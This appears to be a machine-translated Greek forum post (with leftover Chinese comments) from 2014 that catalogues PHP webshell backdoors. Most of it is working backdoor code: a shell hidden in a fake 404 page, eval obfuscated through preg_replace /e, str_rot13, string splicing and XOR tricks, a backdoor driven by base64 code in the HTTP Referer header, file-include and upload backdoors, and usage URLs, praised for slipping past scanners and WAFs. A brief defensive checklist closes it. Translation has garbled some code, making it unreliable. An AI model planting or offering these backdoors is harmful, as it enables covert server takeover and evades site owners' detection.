Αντιμετωπίζουμε αυτά τα προγράμματα κερκόπορτας PHP με νοοτροπία μάθησης και πολύς κώδικας κερκόπορτας PHP μας επιτρέπει να δούμε πόσο καλοπροαίρετοι είναι οι προγραμματιστές.
Ισχυρή κερκόπορτα PHP σε μία πρόταση
Αυτό το είδος κερκόπορτας επιτρέπει σε ιστότοπους,Οι διαχειριστές διακομιστών είναι πολύ ενοχλητικοί και συχνά πρέπει να αλλάξουν μεθόδους για να εκτελέσουν διάφορες ανιχνεύσεις και πολλές νέες τεχνικές γραφής δεν μπορούν να ανακαλυφθούν και να αντιμετωπιστούν με συνηθισμένες μεθόδους ανίχνευσης.
Σήμερα θα μετρήσουμε μερικά ενδιαφέροντα PHP Trojans.
1. Απόκρυψη πόνυ PHP χρησιμοποιώντας 404 σελίδες:
[mw_shl_code=php,αληθές] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Δεν βρέθηκε</title>
</head><body>
<h1>Δεν βρέθηκε</h1>
<p>Η διεύθυνση URL που ζητήθηκε δεν βρέθηκε σε αυτόν τον διακομιστή.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Δεν βρέθηκε');
?>[/mw_shl_code]
Η σελίδα 404 είναι ένα αρχείο που χρησιμοποιείται συνήθως στον ιστότοπο και λίγοι άνθρωποι θα το ελέγξουν και θα το τροποποιήσουν αφού συνιστάται γενικά, ώστε να μπορούμε να το χρησιμοποιήσουμε για να κρύψουμε την κερκόπορτα.
2. Κρυφή PHP χωρίς χαρακτηριστικά σε μία πρόταση:
[mw_shl_code=php,true]<?php
session_start();
$_POST['code'] &&; $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\'])','a');
?>[/mw_shl_code]
Αντιστοιχίστε το $_POST['code'] στο $_SESSION['theCode'] και, στη συνέχεια, εκτελέστε το $_SESSION['theCode'], με το αποκορύφωμα να είναι ότι δεν υπάρχει κωδικός υπογραφής.
Εάν χρησιμοποιείτε ένα εργαλείο σάρωσης για να ελέγξετε τον κωδικό, δεν θα ειδοποιήσει και δεν θα επιτύχει τον στόχο.
3. Super Stealthy PHP Backdoor:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
Η συνάρτηση GET από μόνη της αποτελεί ένα Trojan.
Τρόπος χρήσης:
[mw_shl_code=php,αληθές]
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Μετά την εκτέλεση, ο τρέχων κατάλογος δημιουργεί c.php μια πρόταση Trojan, όταν η παράμετρος A είναι eval, το σφάλμα Trojan generation απέτυχε και όταν είναι assert, θα αναφέρει επίσης ένα σφάλμα, αλλά θα δημιουργήσει έναν δούρειο ίππο, ο οποίος δεν μπορεί να υποτιμηθεί.
Αίτημα επιπέδου, κώδικας για την εκτέλεση της κερκόπορτας PHP:
Αυτή η μέθοδος υλοποιείται με δύο αρχεία, το αρχείο 1
[mw_shl_code=php,true]<?php
//1.php
header('Content-type:text/html; σύνολο χαρακτήρων=utf-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10'&& count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Έγγραφο 2
[mw_shl_code=php,true]<?php
//2.php
header('Content-type:text/html; σύνολο χαρακτήρων=utf-8′);
//要执行的代码
$code= <<<ΚΩΔΙΚΌΣ
phpinfo();
ΚΏΔΙΚΑΣ;
//进行base64编码
$code= base64_encode($code)·
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= πίνακας(
CURLOPT_URL => $url,
CURLOPT_HEADER => ΛΆΘΟΣ,
CURLOPT_RETURNTRANSFER => ΑΛΗΘΈΣ,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options)·
echocurl_exec παράγραφος $ch)·
?>[/mw_shl_code]
Εκτελέστε κώδικα με κωδικοποίηση base64 μέσω του HTTP_REFERER στο αίτημα HTTP για να επιτύχετε το εφέ backdoor.
Είναι καλό να χρησιμοποιήσετε αυτήν την ιδέα για να παρακάμψετε το waf.
4.PHP εργαλείο γεννήτριας backdoor weevely
Το weevely είναι ειδικό για την PHPΤο δωρεάν λογισμικό Webshell, μπορεί να χρησιμοποιηθεί για την προσομοίωση ενός κελύφους σύνδεσης παρόμοιο με το telnet, το Weevely χρησιμοποιείται συνήθως για εκμετάλλευση προγραμμάτων ιστού, απόκρυψη κερκόπορτων ή χρήση μεθόδων που μοιάζουν με telnet αντί για διαχείριση που βασίζεται σε ιστοσελίδες, ο κώδικας PHP από την πλευρά του διακομιστή που δημιουργείται από το Weevely είναι κωδικοποιημένος base64, επομένως μπορεί να εξαπατήσει το κύριο λογισμικό προστασίας από ιούς και το IDS, Μόλις ανεβάσετε τον κώδικα από την πλευρά του διακομιστή, μπορείτε συνήθως να τον εκτελέσετε απευθείας μέσω του Weevely.
Οι συναρτήσεις που χρησιμοποιούνται στην κερκόπορτα είναι συναρτήσεις επεξεργασίας συμβολοσειρών που χρησιμοποιούνται συνήθως και οι συναρτήσεις όπως η αξιολόγηση και το σύστημα που χρησιμοποιούνται ως κανόνες επιθεώρησης δεν θα εμφανίζονται απευθείας στον κώδικα, έτσι ώστε το αρχείο της κερκόπορτας να μπορεί να παρακάμψει τον έλεγχο του εργαλείου αναζήτησης της κερκόπορτας. Η σάρωση με το εργαλείο ανίχνευσης web backdoor της σκοτεινής ομάδας δείχνει ότι το αρχείο δεν απειλείται.
Τα παραπάνω είναι μια γενική εισαγωγή, και οι σχετικές μέθοδοι χρήσης δεν παρουσιάζονται εδώ, μια απλή επιστημονική εκλαΐκευση.
4. Τρεις παραμορφωμένοι Trojans PHP μιας πρότασης
Το πρώτο:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
Το δεύτερο
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ �”). ($_[+“”]|“”). ($_[+“”]^“�”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Γράψτε http://site/2.php?_=assert&__=eval($_POST['pass']) κωδικό πρόσβασης στο κουζινομάχαιρο είναι πέρασμα.
Εάν χρησιμοποιείτε τα πρόσθετα δεδομένα του μαχαιριού κουζίνας, είναι πιο κρυφά ή μπορείτε να χρησιμοποιήσετε άλλα εργαλεία έγχυσης, επειδή υποβάλλονται εκ των υστέρων.
Το τρίτο
[mw_shl_code=php,αληθές] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'προσθήκη'); [/mw_shl_code]
str_rot13 («riny») είναι το κωδικοποιημένο eval, το οποίο αποφεύγει εντελώς τις λέξεις-κλειδιά χωρίς να χάνει το αποτέλεσμα, κάνοντας τους ανθρώπους να κάνουν εμετό με αίμα!
5. Τέλος, αναφέρετε μερικές προηγμένες κερκόπορτες PHP Trojan:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h'],"Πρόσβαση"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
περιλαμβάνουν($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[Το αρχείο μου][tmp_name],$_FILES[Το αρχείο μου][όνομα]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Πρόσβαση"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Συνοψίζοντας, αυτές οι κερκόπορτες της PHP μπορούν να περιγραφούν ως ολοκληρωμένες, αν δεν είστε προσεκτικοί, σίγουρα θα ξεγελαστείτε και ποια είναι η κορυφαία προτεραιότητα του σημερινού μας άρθρου; Τα βασικά σημεία βρίσκονται στην παρακάτω περίληψη!
Πώς να αντιμετωπίσετε την κερκόπορτα μιας πρότασης PHP:
Τονίζουμε μερικά βασικά σημεία και αν διαβάσετε αυτό το άρθρο, πιστεύω ότι δεν είστε λαϊκός, οπότε δεν θα είμαι μακροσκελής:
- Να είστε ενήμεροι για την ασφάλεια όταν γράφετε προγράμματα PHP
- Τα αρχεία καταγραφής διακομιστή θα πρέπει να διαβάζονται συχνά και να δημιουργούνται συχνά αντίγραφα ασφαλείας
- Αυστηρή εκχώρηση αδειών για κάθε τοποθεσία
- Συχνές μαζικές αναθεωρήσεις ασφαλείας δυναμικών αρχείων και καταλόγων
- Μάθετε πώς να πραγματοποιείτε χειροκίνητο anti-virus "Behavioral Judgment Investigation and Killing"
- Μείνετε συντονισμένοι ή διεισδύστε σε ένα ενεργό στρατόπεδο κυβερνοασφάλειας
- Ακόμη και μια συνάρτηση μπορεί να χρησιμοποιηθεί ως κανόνας για ιεραρχική επεξεργασία του περιβάλλοντος διακομιστή
Πιστεύουμε ότι όταν υπάρχουν περισσότεροι ιστότοποι για διαχείριση και μεγάλος όγκος δεδομένων, θα πρέπει εύλογα να εφαρμόσουμε κάποια βοηθητικά εργαλεία, αλλά δεν πρέπει να βασιζόμαστε πλήρως σε αυτά τα εργαλεία, η τεχνολογία πάντα ενημερώνεται και βελτιώνεται, το πιο σημαντικό είναι ότι πρέπει να μάθετε και να κατανοήσετε τη σκέψη της γραφής αυτών των ισχυρών ανθρώπων από την κερκόπορτα και η μεταφορά ρόλων μπορεί να σας φέρει μεγαλύτερη πρόοδο.
|
Δημοσιεύτηκε στις 1/12/2014 9:41:13 μ.μ.
